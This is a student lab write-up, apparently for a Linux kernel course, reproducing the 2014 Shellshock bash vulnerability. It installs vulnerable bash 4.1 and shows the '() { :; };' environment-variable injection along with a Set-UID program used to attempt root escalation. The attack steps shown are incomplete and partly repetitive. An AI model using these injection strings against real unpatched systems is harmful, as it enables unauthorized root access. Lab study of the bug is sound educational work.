zoukankan      html  css  js  c++  java
  • 2019-2020-1 20199314 《Linux内核原理与分析》第十一周作业

    ShellShock 攻击实验

    实验目的:

    2014年9月24日,Bash中发现了一个严重漏洞shellshock,该漏洞可用于许多系统,并且既可以远程也可以在本地触发。在本实验中,学生需要亲手重现攻击来理解该漏洞,并回答一些问题。

    什么是Bashshell?

    它是命令解释器,将用户输入的命令,翻译给内核程序,内核处理完成之后将结果返回给Bash。

    什么是Shellshock?

    Shellshock,又称Bashdoor,是在Unix中广泛使用的Bash shell中的一个安全漏洞,首次于2014年9月24日公开。许多互联网守护进程,如网页服务器,使用bash来处理某些命令,从而允许攻击者在易受攻击的Bash版本上执行任意代码。这可使攻击者在未授权的情况下访问计算机系统。——摘自维基百科

    实验准备

    环境搭建

    以root权限安装4.1版bash(4.2版本以上的漏洞已经被堵上了)

    $ sudo su
    $ wget http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz
    $ tar xf bash-4.1.tar.gz
    $ cd bash-4.1
    $ ./configure #这一步过程比较长,请等待一会
    $ make && make install
    

    衔接

    $ rm /bin/bash
    $ ln -s /usr/local/bin/bash /bin/bash
    

    检测是否存在漏洞,若输出vulnerable的话,说明bash有漏洞。

    exit
    env x='() { :; }; echo vulnerable' bash -c "echo this is a test"
    

    最后,让/bin/sh 指向/bin/bash.

     sudo ln -sf /bin/bash /bin/sh
    

    ShellShock漏洞的真身:

    export foo='() { :; }; echo Hello World'
    bash
    >Hello World
    KEY = foo
    VALUE = () { :; }; echo Hello World
    copy
    

    bash读取了环境变量,在定义foo之后直接调用了后面的函数。 一旦调用bash,自定义的语句就直接触发。

    实验步骤

    通过攻击Set-UID程序来获得root权限。

    首先,确保安装了带有漏洞的bash版本,并让/bin/sh 指向/bin/bash.

    sudo ln -sf /bin/bash /bin/sh
    

    按a或i键切换到插入模式,再输入如下内容:

    #include <stdio.h>
    void main()
    {
    setuid(geteuid()); // make real uid = effective uid.
    system("/bin/ls -l");
    }
    

    编译这段代码,并设置其为Set-UID程序,保证它的所有者是root。

     sudo su
     gcc -o shock shock.c
     chmod u+s shock
     ls -il shock
    

    进行hack攻击

     sudo su
     gcc -o sh0ck shock.c
     chmod u+s sh0ck
     ls -il sh0ck
     exit
    ./shock
    

    将 setuid(geteuid()) 语句被去掉了,再试试看攻击,我们还能够拿到权限么?

    #include <stdio.h>
    void main()
    {
    system("/bin/ls -l");
    }
    

    再次进行hack攻击

     sudo su
     gcc -o sh0ck shock.c
     chmod u+s sh0ck
     ls -il sh0ck
     exit
     ./sh0ck
    

    hack攻击,未获取root权限

    注意:real uid 和 effective uid 相同的话,定义在环境变量中的内容在该程序内有效,那样shellshock漏洞就能够被利用了。但是如果两个 uid 不同的话,环境变量失效,就无法发动攻击了。

    实验中的错误与教训:

    当我在本地虚拟机上按顺序执行实验楼上的代码时,虚拟机报错,退回到登陆界面后一直卡在登陆界面,输入密码后又会回到登陆界面,不管试了网上的办法也没办法解决问题,不太清楚是实验中哪一步把ubantu系统搞崩溃,但是有一点可以确定,本地上跑这种代码还是算了吧,放在实验楼上跑。

  • 相关阅读:
    虚拟机中按键切回windows系统界面快捷键
    余数
    质数(素数)判断代码实现
    =excel========》函数使用
    python 正则表达式规则
    linux常用命令详解
    c指针
    visual studio 2015 开发时常见问题的解决方案
    python装饰器
    构造方法
  • 原文地址:https://www.cnblogs.com/morvalhe/p/11944748.html
Copyright © 2011-2022 走看看